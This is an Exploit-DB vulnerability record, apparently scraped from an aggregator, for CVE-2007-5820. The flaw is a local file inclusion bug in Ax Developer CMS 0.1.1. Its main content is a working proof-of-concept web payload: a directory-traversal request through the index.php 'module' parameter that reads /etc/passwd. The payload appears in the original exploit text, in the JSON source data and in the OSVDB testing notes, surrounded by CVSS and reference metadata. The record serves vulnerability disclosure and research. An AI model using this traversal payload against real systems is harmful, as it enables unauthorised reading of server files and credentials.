ID EDB-ID:4599 Type exploitdb Reporter GoLd_M Modified 2007-11-02T00:00:00
Description
Ax Developer CMS 0.1.1 (index.php module) Local File Inclusion Vuln. CVE-2007-5820. Webapps exploit for php platform
###################################
# W w w . T r Y a G . C o m #
#################################################################################
# Ax Developer CMS 0.1.1 (index.php module) Local File Inclusion Vulnerability #
# http://sourceforge.net/projects/axdcms/ #
# POC : #
# /index.php?module=../../../../../../../../etc/passwd%00 #
#################################################################################
# W w w . T r Y a G . C o m #
###################################
# milw0rm.com [2007-11-02]
{"id": "EDB-ID:4599", "hash": "c009c5556b6f2b9319d076fc2c524807", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ax Developer CMS 0.1.1 - index.php module Local File Inclusion Vuln", "description": "Ax Developer CMS 0.1.1 (index.php module) Local File Inclusion Vuln. CVE-2007-5820. Webapps exploit for php platform", "published": "2007-11-02T00:00:00", "modified": "2007-11-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/4599/", "reporter": "GoLd_M", "references": [], "cvelist": ["CVE-2007-5820"], "lastseen": "2016-01-31T21:18:53", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-01-31T21:18:53"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5820"]}, {"type": "osvdb", "idList": ["OSVDB:39021"]}], "modified": "2016-01-31T21:18:53"}, "vulnersScore": 6.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4599/", "sourceData": " ###################################\n # W w w . T r Y a G . C o m #\n#################################################################################\n# Ax Developer CMS 0.1.1 (index.php module) Local File Inclusion Vulnerability #\n# http://sourceforge.net/projects/axdcms/ #\n# POC : #\n# /index.php?module=../../../../../../../../etc/passwd%00 #\n#################################################################################\n # W w w . T r Y a G . C o m #\n ###################################\n\n# milw0rm.com [2007-11-02]\n", "osvdbidlist": ["39021"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:02", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in index.php in Ax Developer CMS (AxDCMS) 0.1.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module parameter.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-5820", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5820", "published": "2007-11-05T19:46:00", "title": "CVE-2007-5820", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Manual Testing Notes\n/index.php?module=../../../../../../../../etc/passwd%00\n## References:\nISS X-Force ID: 38224\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4599\nFrSIRT Advisory: ADV-2007-3749\n[CVE-2007-5820](https://vulners.com/cve/CVE-2007-5820)\nBugtraq ID: 26306\n", "modified": "2007-11-02T00:00:00", "published": "2007-11-02T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39021", "id": "OSVDB:39021", "title": "Ax Developer CMS index.php module Variable Traversal Local File Inclusion", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
